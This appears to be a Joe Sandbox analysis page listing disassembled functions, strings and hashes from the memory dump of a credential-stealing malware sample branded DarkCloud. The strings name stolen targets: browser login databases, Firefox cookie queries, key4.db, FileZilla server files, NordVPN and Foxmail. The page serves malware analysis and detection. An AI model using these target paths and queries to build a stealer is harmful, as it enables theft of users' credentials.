Associated: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: "Content raw": "$ "Expires raw": "$ "Expires": "$ "First Party Domain": ""$ "HTTP only raw": "false",$ "Host raw": "https://$ "Name raw": "$ "Path raw": "$ "SameSite raw": "no_restriction",$ "Send for raw": "false",$ "Send for": "Any type of connection",$ "Store raw": "firefox-default",$ "This domain only raw": "false",$ "This domain only": "Valid for subdomains",$#$280C06232C2C12354B0D34$3808052B052000026218243B073B31$CopyFile$SELECT expiry, host, name, path, value FROM moz_cookies$Scripting.FileSystemObject$atoiLGEwFeiVHPRRwaFJRpyVNXCUuvihFoAKykoVrs$d$sdkjDnIeqLkUWnOTlTLZkhBVLcHoDQJv
API String ID: 0-1479004509
Opcode ID: a9212a3f136a7b3ef7c7912ffeefa9b9e948aa3aa91a410b51d84051e8a56e0c
Instruction ID: 7f992015be3267ad489f0bc251aeab035603fd1b62ce17b5a4a8d219e2eb568e
Opcode Fuzzy Hash: a9212a3f136a7b3ef7c7912ffeefa9b9e948aa3aa91a410b51d84051e8a56e0c
Instruction Fuzzy Hash: A2924A76940119DFDB25DFA0DD48BEEB778FB58300F0081EAE54AA25A0EB705B89CF54

Function 00415004 Relevance: 27.1, Strings: 20, Instructions: 2114COMMON

Download Yara Rule

Strings

\User Data\Default\Login Data, xrefs: 00415691, 004159E5
\User Data, xrefs: 00415321, 00415CC9
EelOyNuaINcq, xrefs: 00415A9C, 00415DA8
Profiles, xrefs: 0041603A
Server, xrefs: 00418DC3, 00419AE7
===============DARKCLOUD===============, xrefs: 004197E4, 0041A491
Application : FileZilla, xrefs: 0041A414
14161C200E01390139092978684C1E032A2B3E3F150400, xrefs: 00419676
oUflLgbXuPfGXRlXjFNdVyhabGBKQXI, xrefs: 004196C5
pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr, xrefs: 00419698, 0041A39A
\recentservers.xml, xrefs: 00418B96, 00418CCB
oCvmYcoGlFYNwmtOWwlqnHgtgnUneQjTYjnpjxcwyGDg, xrefs: 004150F4, 00415400
\sitemanager.xml, xrefs: 004198B9, 004199EF
12283A02321C16344C7E51, xrefs: 00419654, 0041A378
3920201E271B410D2F1710, xrefs: 00415A71, 00415D7D
U, xrefs: 00416737
%, xrefs: 0041A4DE
1F32083F021A2B181A152110041A6F13161810, xrefs: 004150C9, 004153D5
\accounts.xml, xrefs: 004180B3, 004181E9
\Profiles, xrefs: 004160D2, 00416355, 004166A6

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: %$12283A02321C16344C7E51$14161C200E01390139092978684C1E032A2B3E3F150400$1F32083F021A2B181A152110041A6F13161810$3920201E271B410D2F1710$===============DARKCLOUD===============$Application : FileZilla$EelOyNuaINcq$Profiles$Server$U$\Profiles$\User Data$\User Data\Default\Login Data$\accounts.xml$\recentservers.xml$\sitemanager.xml$oCvmYcoGlFYNwmtOWwlqnHgtgnUneQjTYjnpjxcwyGDg$oUflLgbXuPfGXRlXjFNdVyhabGBKQXI$pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr
API String ID: 0-873198084
Opcode ID: c9a434011936a87c6e1745d284de86d3a8089115658ba4cdf6b2a4c35b3debf7
Instruction ID: 55855ac4401ad6ba7a1910dbc3d6b9d797c694a4896aceebc636fcb5dd344935
Opcode Fuzzy Hash: c9a434011936a87c6e1745d284de86d3a8089115658ba4cdf6b2a4c35b3debf7
Instruction Fuzzy Hash: 4533F674A00218DFDB24DF54DD88BEEB7B5BB49300F1081AAE50AB7260DB745AC9CF59

Function 00415095 Relevance: 27.0, Strings: 20, Instructions: 1997COMMON

Download Yara Rule

Strings

\User Data\Default\Login Data, xrefs: 00415691, 004159E5
\User Data, xrefs: 00415321, 00415CC9
EelOyNuaINcq, xrefs: 00415A9C, 00415DA8
Profiles, xrefs: 0041603A
Server, xrefs: 00418DC3, 00419AE7
===============DARKCLOUD===============, xrefs: 004197E4, 0041A491
S, xrefs: 0041672B
Application : FileZilla, xrefs: 0041A414
14161C200E01390139092978684C1E032A2B3E3F150400, xrefs: 00419676
oUflLgbXuPfGXRlXjFNdVyhabGBKQXI, xrefs: 004196C5
pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr, xrefs: 00419698, 0041A39A
\recentservers.xml, xrefs: 00418B96, 00418CCB
oCvmYcoGlFYNwmtOWwlqnHgtgnUneQjTYjnpjxcwyGDg, xrefs: 004150F4, 00415400
\sitemanager.xml, xrefs: 004198B9, 004199EF
12283A02321C16344C7E51, xrefs: 00419654, 0041A378
3920201E271B410D2F1710, xrefs: 00415A71, 00415D7D
%, xrefs: 0041A4DE
1F32083F021A2B181A152110041A6F13161810, xrefs: 004150C9, 004153D5
\accounts.xml, xrefs: 004180B3, 004181E9
\Profiles, xrefs: 004160D2, 00416355, 004166A6

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: %$12283A02321C16344C7E51$14161C200E01390139092978684C1E032A2B3E3F150400$1F32083F021A2B181A152110041A6F13161810$3920201E271B410D2F1710$===============DARKCLOUD===============$Application : FileZilla$EelOyNuaINcq$Profiles$S$Server$\Profiles$\User Data$\User Data\Default\Login Data$\accounts.xml$\recentservers.xml$\sitemanager.xml$oCvmYcoGlFYNwmtOWwlqnHgtgnUneQjTYjnpjxcwyGDg$oUflLgbXuPfGXRlXjFNdVyhabGBKQXI$pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr
API String ID: 0-2202475306
Opcode ID: 3c0bbc24f4ee41042be4d8ea5cf4aa87f277f241be66ef7b9e61c03a45bf3bf8
Instruction ID: 61d9253cce221660daf4f08733399e105b37d4a1501223d5b4e238b9b35d9cc7
Opcode Fuzzy Hash: 3c0bbc24f4ee41042be4d8ea5cf4aa87f277f241be66ef7b9e61c03a45bf3bf8
Instruction Fuzzy Hash: 7B23F874A00218DFDB24DF54DD84BEEB7B5BB49300F1081AAE50AB72A0DB745AC9CF59

Function 00404B01 Relevance: 26.8, Strings: 21, Instructions: 542COMMON

Download Yara Rule

Strings

TnYCAzdjcQGm, xrefs: 00410228
C, xrefs: 00404B01
22133F0535201D10182B12, xrefs: 00410141
242D291A24103127, xrefs: 0040FFFB
ntYJDEuDIrnNYYYdTSImaLyNMbtVWJUj, xrefs: 004103C0
nJQHfTiYjEvrbDtdfCRMwZBOeTFJpSfeE, xrefs: 004105A9
2D160E112F302F311F062011, xrefs: 004101E4
1B3020343D3E3115210E0B3836, xrefs: 004104E4
041920022A3236, xrefs: 0040FF58
gXBYDIQftMbnLEuPrkdvW, xrefs: 00410506
lBhEEhrcobfPgvjWQkGIUBxdeSOqasPbR, xrefs: 0041028E
173B001726332E2A, xrefs: 00410206
rCyTVoiqsUNwEMbuttbPvdXylgyYMXqNO, xrefs: 00410463
001A1924382A1816, xrefs: 0041009E
273A3821201B37211D1A, xrefs: 0041039E
081C2D120E1D10, xrefs: 00410441
cAaZaPNiyyGaTTavjDwSYsQLKBKshhaepY, xrefs: 00410163
0C38240327, xrefs: 00410587
QGvOiCWEQFcIEEuTtfojVvW, xrefs: 0040FF7A
TCuwPYIleynnJOtdWuMHDJGgZWsFRXWgGJViSeAeoCc, xrefs: 004100C0
ciHZiEwTTCBUmvkjIFDBFouIEtnVBLYW, xrefs: 0041001D

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: 001A1924382A1816$041920022A3236$081C2D120E1D10$0C38240327$173B001726332E2A$1B3020343D3E3115210E0B3836$22133F0535201D10182B12$242D291A24103127$273A3821201B37211D1A$2D160E112F302F311F062011$C$QGvOiCWEQFcIEEuTtfojVvW$TCuwPYIleynnJOtdWuMHDJGgZWsFRXWgGJViSeAeoCc$TnYCAzdjcQGm$cAaZaPNiyyGaTTavjDwSYsQLKBKshhaepY$ciHZiEwTTCBUmvkjIFDBFouIEtnVBLYW$gXBYDIQftMbnLEuPrkdvW$lBhEEhrcobfPgvjWQkGIUBxdeSOqasPbR$nJQHfTiYjEvrbDtdfCRMwZBOeTFJpSfeE$ntYJDEuDIrnNYYYdTSImaLyNMbtVWJUj$rCyTVoiqsUNwEMbuttbPvdXylgyYMXqNO
API String ID: 0-161851618
Opcode ID: b995e84f250b1434534194385aa3386d8d3c15a5fcdf46903724f073fb0cba7d
Instruction ID: 20ced64c99c0b42045c7c473594348e9dafc600ebd5a0ea38016d4a2a5e4d4a5
Opcode Fuzzy Hash: b995e84f250b1434534194385aa3386d8d3c15a5fcdf46903724f073fb0cba7d
Instruction Fuzzy Hash: 0732E976910109ABCB04DFD4DE94EDEB7B9FF48304F10816AE506B6164EB74AB09CF64

Function 00413002 Relevance: 25.5, Strings: 19, Instructions: 1723COMMON

Download Yara Rule

Strings

\User Data\Default\Login Data, xrefs: 004131BF
\User Data, xrefs: 004134A2
Profiles, xrefs: 00413810
EelOyNuaINcq, xrefs: 00413276, 00413581
Server, xrefs: 00418DC3, 00419AE7
===============DARKCLOUD===============, xrefs: 004197E4, 0041A491
Application : FileZilla, xrefs: 0041A414
14161C200E01390139092978684C1E032A2B3E3F150400, xrefs: 00419676
oUflLgbXuPfGXRlXjFNdVyhabGBKQXI, xrefs: 004196C5
pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr, xrefs: 00419698, 0041A39A
\recentservers.xml, xrefs: 00418B96, 00418CCB
\sitemanager.xml, xrefs: 004198B9, 004199EF
12283A02321C16344C7E51, xrefs: 00419654, 0041A378
NordVPN, xrefs: 00413F86
!, xrefs: 00413FAB
3920201E271B410D2F1710, xrefs: 0041324B, 00413556
%, xrefs: 0041A4DE
\accounts.xml, xrefs: 004180B3, 004181E9
\Profiles, xrefs: 004138A7, 00413B27, 00413E74

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: !$%$12283A02321C16344C7E51$14161C200E01390139092978684C1E032A2B3E3F150400$3920201E271B410D2F1710$===============DARKCLOUD===============$Application : FileZilla$EelOyNuaINcq$NordVPN$Profiles$Server$\Profiles$\User Data$\User Data\Default\Login Data$\accounts.xml$\recentservers.xml$\sitemanager.xml$oUflLgbXuPfGXRlXjFNdVyhabGBKQXI$pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr
API String ID: 0-3586936247
Opcode ID: fb03c54fcc4d0e702578199d42806db851871e65c2032ccb72691d79ed56e10c
Instruction ID: 0443e4980f1f21bf98d10aceea25d6cb9131f828f8883654dff94d465d606ab6
Opcode Fuzzy Hash: fb03c54fcc4d0e702578199d42806db851871e65c2032ccb72691d79ed56e10c
Instruction Fuzzy Hash: 38032674A00218DFDB24DF54DD88BEEB7B5FB49300F1081AAE50AB7260DB745A89CF59

Function 00426066 Relevance: 20.8, Strings: 16, Instructions: 778COMMON

Download Yara Rule

Strings

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Foxmail.url.mailto\Shell\open\command\, xrefs: 00426B6B
23051C3F142E3B4A2D0F0D, xrefs: 00426C02
CopyFile, xrefs: 00426427
\keyDBPath.db, xrefs: 004263B8, 004264DF, 004265E4
0E01003A033D22671027310935, xrefs: 00426A54
eYRcHjMVICOT, xrefs: 00426A7F
\key4.db, xrefs: 0042621D, 0042639C
133A0B3D023B3D077F1E381500073D, xrefs: 00426613
RegRead, xrefs: 00426BB0
0805082D312111482B272514, xrefs: 0042609C, 00426471
C:\\, xrefs: 004268E0
YOIbZlTStQmIyisXUwuDhMCo, xrefs: 00426635
\key3.db, xrefs: 0042669A
AejdRuGWdHwhHBpojiHLXZdctJmTbHTJ, xrefs: 00426C2D
TTigJXObfATJzEhJqRthEtfg, xrefs: 004260BE, 00426493
Scripting.FileSystemObject, xrefs: 004262F6

Memory Dump Source

Source File: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: 0805082D312111482B272514$0E01003A033D22671027310935$133A0B3D023B3D077F1E381500073D$23051C3F142E3B4A2D0F0D$AejdRuGWdHwhHBpojiHLXZdctJmTbHTJ$C:\\$CopyFile$HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Foxmail.url.mailto\Shell\open\command\$RegRead$Scripting.FileSystemObject$TTigJXObfATJzEhJqRthEtfg$YOIbZlTStQmIyisXUwuDhMCo$\key3.db$\key4.db$\keyDBPath.db$eYRcHjMVICOT
API String ID: 0-3435249001
Opcode ID: cc854bc2848bdd99207bde9495dae377a7f94645c072700f7ae7534d53e5b062
Instruction ID: 74611d4a700befc1d0f59727be61c142d5f13d4dc9215cb5419ad0f8c98db21f
Opcode Fuzzy Hash: cc854bc2848bdd99207bde9495dae377a7f94645c072700f7ae7534d53e5b062
Instruction Fuzzy Hash: 88723C75900218DFDB14DFA4DD88BEEB7B5FB48300F1081A9E50AB72A4DB745A89CF58

Function 00417FFC Relevance: 14.6, Strings: 11, Instructions: 816COMMON

Download Yara Rule

Strings

12283A02321C16344C7E51, xrefs: 00419654, 0041A378
Server, xrefs: 00418DC3, 00419AE7
===============DARKCLOUD===============, xrefs: 004197E4, 0041A491
Application : FileZilla, xrefs: 0041A414
14161C200E01390139092978684C1E032A2B3E3F150400, xrefs: 00419676
oUflLgbXuPfGXRlXjFNdVyhabGBKQXI, xrefs: 004196C5
%, xrefs: 0041A4DE
pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr, xrefs: 00419698, 0041A39A
\accounts.xml, xrefs: 004180B3, 004181E9
\recentservers.xml, xrefs: 00418B96, 00418CCB
\sitemanager.xml, xrefs: 004198B9, 004199EF

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: %$12283A02321C16344C7E51$14161C200E01390139092978684C1E032A2B3E3F150400$===============DARKCLOUD===============$Application : FileZilla$Server$\accounts.xml$\recentservers.xml$\sitemanager.xml$oUflLgbXuPfGXRlXjFNdVyhabGBKQXI$pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr
API String ID: 0-980630229
Opcode ID: a760661b25f7c2f7b05c0f9bc38570c89529ee2fc7355aaad439aacc288edcd8
Instruction ID: a8fcfd2d55697278cee08249899d76596625b49b9685b958130063d3e50dfd33
Opcode Fuzzy Hash: a760661b25f7c2f7b05c0f9bc38570c89529ee2fc7355aaad439aacc288edcd8
Instruction Fuzzy Hash: 65821B75A00218DFDB14DF94DD88BEEB7B5FB48300F1081AAE50AB72A0DB745A89CF55

Function 00425FA0 Relevance: 11.8, Strings: 9, Instructions: 536COMMON

Download Yara Rule

Strings

0805082D312111482B272514, xrefs: 0042609C, 00426471
YOIbZlTStQmIyisXUwuDhMCo, xrefs: 00426635
\key3.db, xrefs: 0042669A
CopyFile, xrefs: 00426427
\keyDBPath.db, xrefs: 004263B8, 004264DF, 004265E4
\key4.db, xrefs: 0042621D, 0042639C
TTigJXObfATJzEhJqRthEtfg, xrefs: 004260BE, 00426493
133A0B3D023B3D077F1E381500073D, xrefs: 00426613
Scripting.FileSystemObject, xrefs: 004262F6

Memory Dump Source

Source File: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: 0805082D312111482B272514$133A0B3D023B3D077F1E381500073D$CopyFile$Scripting.FileSystemObject$TTigJXObfATJzEhJqRthEtfg$YOIbZlTStQmIyisXUwuDhMCo$\key3.db$\key4.db$\keyDBPath.db
API String ID: 0-1859792026
Opcode ID: 533ff303b3ae84f761f6023a2915b6b38b4634228108400d9e6bb7b622fba5bd
Instruction ID: 2e573a8613f2ce7bb868ef27f55f0eeab1b0e692e867d7626a04d8a92fc3ee89
Opcode Fuzzy Hash: 533ff303b3ae84f761f6023a2915b6b38b4634228108400d9e6bb7b622fba5bd
Instruction Fuzzy Hash: 0A322C75900218DFDB14DFA4DD88BEDB7B4FB48304F1081A9E50AB7264DB745A89CF58

Function 00413039 Relevance: 10.8, Strings: 8, Instructions: 816COMMON

Download Yara Rule

Strings

\User Data\Default\Login Data, xrefs: 004131BF
NordVPN, xrefs: 00413F86
\User Data, xrefs: 004134A2
!, xrefs: 00413FAB
Profiles, xrefs: 00413810
EelOyNuaINcq, xrefs: 00413276, 00413581
3920201E271B410D2F1710, xrefs: 0041324B, 00413556
\Profiles, xrefs: 004138A7, 00413B27, 00413E74

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: !$3920201E271B410D2F1710$EelOyNuaINcq$NordVPN$Profiles$\Profiles$\User Data$\User Data\Default\Login Data
API String ID: 0-861500576
